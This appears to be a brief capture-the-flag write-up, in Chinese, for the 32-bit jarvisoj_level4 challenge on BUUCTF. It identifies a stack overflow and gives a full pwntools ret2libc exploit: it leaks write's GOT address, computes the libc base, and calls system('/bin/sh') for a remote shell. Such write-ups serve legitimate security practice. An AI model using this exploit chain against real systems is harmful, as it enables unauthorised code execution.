checksec
IDA
很明显的栈溢出,没有system(bin/sh)
32位的ret2libc3
EXP
老规矩的脚本
from pwn import *
#start
r = remote("node4.buuoj.cn",29365)
# r = process("../buu/jarvisoj_level4")
elf = ELF("./34level4")
libc = ELF("./libc-2.23-32.so")
#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']
#attack
payload = b'M'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) +p32(write_got) +p32(4)
r.sendline(payload)
write_addr = u32(r.recv(4))
#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))
#attack2
payload = b'M'*(0x88+4) + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr)
r.sendline(payload)
r.interactive()